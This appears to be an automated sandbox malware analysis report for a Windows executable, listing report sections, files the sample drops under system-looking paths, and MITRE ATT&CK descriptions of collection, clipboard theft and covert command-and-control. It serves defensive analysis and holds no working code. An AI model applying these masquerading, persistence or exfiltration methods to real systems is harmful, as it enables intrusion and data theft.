Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Windows Defender\c5b4cb5e9653cc

C:\Program Files (x86)\Windows Defender\services.exe

C:\Program Files\Windows Security\BrowserCore\en-US\931b00cae9730a

C:\Program Files\Windows Security\BrowserCore\en-US\XXPWErhsUbDrk.exe

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

C:\Recovery\931b00cae9730a

C:\Recovery\XXPWErhsUbDrk.exe

C:\Users\Default\Pictures\931b00cae9730a

C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\driverInto.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\0Iv3hBTsfc

Windows Analysis Report
Vqzx4PFehn.exe

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre